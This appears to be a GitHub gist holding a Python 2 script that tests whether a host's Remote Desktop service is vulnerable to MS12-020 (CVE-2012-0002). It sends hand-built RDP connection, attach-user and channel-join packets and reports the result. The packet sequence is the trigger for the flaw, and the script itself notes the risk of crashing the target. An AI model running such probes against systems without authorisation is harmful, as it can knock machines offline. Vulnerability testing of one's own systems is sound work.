MS12-020/CVE-2012-0002 Vulnerability Tester
#!/usr/bin/env python | |
""" | |
MS12-020/CVE-2012-0002 Vulnerability Tester | |
based on sleepya's version @ http://pastebin.com/Ks2PhKb4 | |
""" | |
import socket | |
import struct | |
import sys | |
from binascii import hexlify, unhexlify | |
def exploit(host, port): | |
# See http://msdn.microsoft.com/en-us/library/cc240836%28v=prot.10%29.aspx | |
connection_request = unhexlify(''.join([ | |
"0300", # TPKT Header version 03, reserved 0 | |
"0013", # Length | |
"0e", # X.224 Data TPDU length | |
"e0", # X.224 Type (Connection request) | |
"0000", # dst reference | |
"0000", # src reference | |
"00", # class and options | |
"01", # RDP Negotiation Message | |
"00", # flags | |
"0800", # RDP Negotiation Request Length | |
"00000000" # RDP Negotiation Request | |
])) | |
initial_pdu = unhexlify(''.join([ | |
"03000065", # TPKT Header | |
"02f080", # Data TPDU, EOT | |
"7f655b", # Connect-Initial | |
"040101", # callingDomainSelector | |
"040101", # calledDomainSelector | |
"0101ff", # upwardFlag | |
"3019", # targetParams + size (25 bytes) | |
"020122", # maxChannelIds | |
"020120", # maxUserIds | |
"020100", # maxTokenIds | |
"020101", # numPriorities | |
"020100", # minThroughput | |
"020101", # maxHeight | |
"0202ffff", # maxMCSPDUSize | |
"020102", # protocolVersion | |
"3018", # minParams + size (24 bytes) | |
"020101", # maxChannelIds | |
"020101", # maxUserIds | |
"020101", # maxTokenIds | |
"020101", # numPriorities | |
"020100", # minThroughput | |
"020101", # maxHeight | |
"0201ff", # maxMCSPDUSize | |
"020102", # protocolVersion | |
"3019", # maxParams + size (25 bytes) | |
"0201ff", # maxChannelIds | |
"0201ff", # maxUserIds | |
"0201ff", # maxTokenIds | |
"020101", # numPriorities | |
"020100", # minThroughput | |
"020101", # maxHeight | |
"0202ffff", # maxMCSPDUSize | |
"020102", # protocolVersion | |
"0400", # userData | |
])) | |
user_request = unhexlify(''.join([ | |
"0300", # header | |
"0008", # length | |
"02f080", # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT) | |
"28", # PER encoded PDU contents | |
])) | |
channel_join_request = unhexlify("0300000c02f08038") | |
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
skt.settimeout(10) | |
skt.connect((host, port)) | |
skt.send(connection_request) | |
data = skt.recv(8192) | |
if data != unhexlify("0300000b06d00000123400") \ | |
and data != unhexlify("030000130ed000001234000201080000000000"): | |
print "ERROR: This isn't RDP" | |
raise SystemExit(1) | |
skt.send(initial_pdu) | |
# Send attach user request | |
skt.send(user_request) | |
data = skt.recv(8192) | |
user1 = data[9:11] | |
# Send another attach user request | |
skt.send(user_request) | |
data = skt.recv(8192) | |
user2_int = int(hexlify(data[9:11]), base=16) | |
user2 = struct.pack('!H', user2_int + 1001) | |
# Send channel join request | |
skt.send(channel_join_request + user1 + user2) | |
data = skt.recv(8192) | |
if data[7:9] == "\x3e\x00": | |
""" 0x3e00 indicates a successful join; this service is vulnerable """ | |
print "This device is vulnerable" | |
# Complete request to prevent BSOD | |
skt.send(channel_join_request + struct.pack('!H', user2_int) + user2) | |
data = skt.recv(8192) | |
else: | |
# Patched | |
print "This device is not vulnerable to MS12-020." | |
skt.close() | |
if __name__ == '__main__': | |
exploit(sys.argv[1], int(sys.argv[2])) | |
# vim: set expandtab ts=2 sw=2: |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment